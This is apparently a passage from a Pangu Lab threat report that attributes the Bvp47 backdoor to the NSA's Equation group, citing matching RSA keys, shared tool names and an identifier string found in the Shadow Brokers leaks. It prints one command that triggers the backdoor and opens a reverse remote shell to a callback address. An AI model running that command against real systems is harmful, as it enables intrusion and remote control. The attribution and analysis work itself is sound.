4. Attacker Correlation and Attribution
“The Shadow Brokers Leaks” Incident Correlation
In 2016, a hacker group named Shadow Broker released two compressed files, eqgrp-free-file.tar.xz.gpg
and eqgrp-auction-file.tar.xz.gpg, claiming to have compromised the United States NSA's Equation group.
The compressed file contains a large number of hacking tools of Equation group. Among them, the
eqgrp-free-file.tar.xz.gpg compressed file is available for public download for inspection, and the other is
sold at a current price of 1 million bitcoins for the decompression password of the eqgrp-auc
tion-file.tar.xz.gpg file. However, no one would buy it. Finally, Shadow Broker chose to publish the decom
pression password of eqgrp-auction-file.tar.xz.gpg in April 2017.
In the process of analyzing the eqgrp-auction-file.tar.xz.gpg file, it was found that Bvp47 and the attacking
tools in the compressed package were technically deterministic, mainly including “dewdrops”, “solution
char_agents”, “tipoffs”, “StoicSurgeon”, “insision” and other directories. The “dewdrops_tipoffs” contains
the private key required by Bvp47 for RSA public-private key communication. On this basis, it can be con
firmed that Bvp47 is from Equation group.
Among them, “dewdrops” and “solutionchar_agents” are integrated into the Bvp47 sample platform as
component functions, and the “tipoffs” directory is the control end of the Bvp47 remote communication.
Beijing Qi An Pangu Laboratory Technology Co., Ltd www.pangulab.cn 8
Asymmetric Algorithm Private Key Match
The “tipoffs” directory contains the RSA asymmetric algorithm private key used in the Bvp47 covert chan
nel. That RSA private key is vital to Bvp47's command execution and other operations.
Samples In-depth Correlation
The user.tool.stoicsurgeon.COMMON file in the eqgrp-auction-file.tar.xz.gpg file\Linux\doc\old\etc\ direc
tory describes how to use the tipoff-BIN tool, and also reveals a series of Information:

Bvp47 contains the module named "dewdrop", which can be triggered by the RSA private key of moudle

"tipoff";

File COMMON descript a backdor named "StoicSurgeon", namely a stoic surgeon, a multi-platform

advanced rootkit backdoor, which can be combined use with "dewdrop";


"StoicSurgeon" also has a little brother, "Incision", which is an incision and a rootkit backdoor;


During invasion, "Incision" can be upgraded to "StoicSurgeon";


Beijing Qi An Pangu Laboratory Technology Co., Ltd www.pangulab.cn 9
The operating system supported by dewdrop basically covers mainstream Linux distributions, JunOS,
FreeBSD, Solaris, etc.
The operating system supported by StoicSurgeon basically covers mainstream Linux distributions,JU
NOS,FreeBSD,Solaris,etc.
Beijing Qi An Pangu Laboratory Technology Co., Ltd www.pangulab.cn 10
How to upgrade from Incision to Stoicsurgeon is provided in the file "user.tool.linux.remove_in
stall_ss.COMMON".
Beijing Qi An Pangu Laboratory Technology Co., Ltd www.pangulab.cn 11
Full Control Command Line
Bounce back connection operation of Bvp47 backdoor can be done by following command:
#./tipoffs/dewdrop_tipoff --trigger-address 11.22.33.44 --target-address
12.34.56.78 --target-protocol tcp --target-port 1357 --callback-address 13.24.57.68
--callback-port 2468 --start-ish
Among them, ish corresponds to the file ish in the \eqgrp-auction-file\Linux\bin directory, combined with
the leaked ish tool, successfully activated the backdoor Bvp47, completed the remote download execution
function, and opened the remote shell.
Beijing Qi An Pangu Laboratory Technology Co., Ltd www.pangulab.cn 12
In addition, there are other commands to remotely execute the specified program:
Connection with Snowden Incident
In December 2013, the German media "Der Spiegel" published an NSA ANT catalog with 50 pictures. This
is a series of top-secret materials compiled by the NSA in 2008-2009, including the use of a series of
advanced hacking tools. The source of information may come from Edward Snowden or another unknown
intelligence provider [Reference 3].
The FOXACID-Server-SOP-Redacted.pdf file in the NSA ANT catalog [Reference 4], that is, the "Acid Fox"
Project-Server Standard Operating Procedure Revision, NSA Vulnerability Attack Operating Platform
Functional Description and User Manual, in this standard work. The document describes the mandatory
unique identification code required for the job, "ace02468bdf13579".
Beijing Qi An Pangu Laboratory Technology Co., Ltd www.pangulab.cn 13
In the compressed eqgrp-free-file.tar.xz.gpg leaked by Shadow Brokers, SecondDate-3021.exe ， in the
\eqgrp-free-file\Firewall\BANANAGLEE\BG3000\Install\LP\Modules\PIX\ directory ， also has a unique
identification code of "ace02468bdf13579", and the file name “SecondDate” conforms to the standard of
operation document.
If SecondDate-3021.exe is just a coincidence, string "ace02468bdf13579" appears in the 47 files related
to the tool named SecondDate in the leaked tool set, which is obviously not a coincidence that can be
explained.
And in a SecondDate file named \eqgrp-free-file\Firewall\SCRIPTS\ directory, it describes how to use
SecenData, which is consistent with the description of FOXACID-Server-SOP-Redacted.pdf mentioned
earlier.
Beijing Qi An Pangu Laboratory Technology Co., Ltd www.pangulab.cn 14
After analyzing more than 90 programs related to SecondDate, it is found that the SecondDate program
spans multiple platforms and architectures, such as Windows, Linux, Solaris, etc. The types from execut
able files to shellcode are very comprehensive, and it has undergone multiple iterations of the lowest
version. 1.3.0.1 was created in May 2007, and the highest version 3.0.3.6 was created in October 2013.
The starting time was in line with the top-secret electronic monitoring plan implemented in 2007 as
described by the PRISM Project (PRISM), and it lasted as long as 6 years. The iterative version, perfect
cross-platform, support for various architectures, and diversified startup methods imply the strong organi
zational and technical capabilities behind the project.
Moreover, the relationship between STOICSURGEON and the SECONDDATE program is also clarified in
the opscript.txt in the "EquationGroup-master\Linux\etc" directory:
Therefore, there are enough reasons to believe that the two compressed files leaked by Shadow Brokers
in 2016 and 2017 belonged to the NSA Equation group’s hacking tools.
Bvp47—US NSA’s Top-tier Backdoor

The unique feature identifier "ace02468bdf13579" in the hacker tool mentioned in the material of the

NSA ANT catalog FOXACID-Server-SOP-Redacted.pdf has appeared in the tool set of "The Shadow
Brokers Leaks" many times;

The RSA private key in the Bvp47 backdoor program exists in the tool tipoff-BIN of "The Shadow Brokers

Leaks";

Use the tool tipoff-BIN of "The Shadow Brokers Leaks" to directly activate the moule Dewdrops of the

backdoor Bvp47, and Dewdrop and STOICSURGEON were belong to the same series backdoor ;

It is finally determined that the Bvp47 backdoor is assembled by the "The Shadow Brokers Leaks" tool

module, that is, Bvp47 belongs to the top backdoor of the Equation group of US NSA;
Beijing Qi An Pangu Laboratory Technology Co., Ltd www.pangulab.cn 15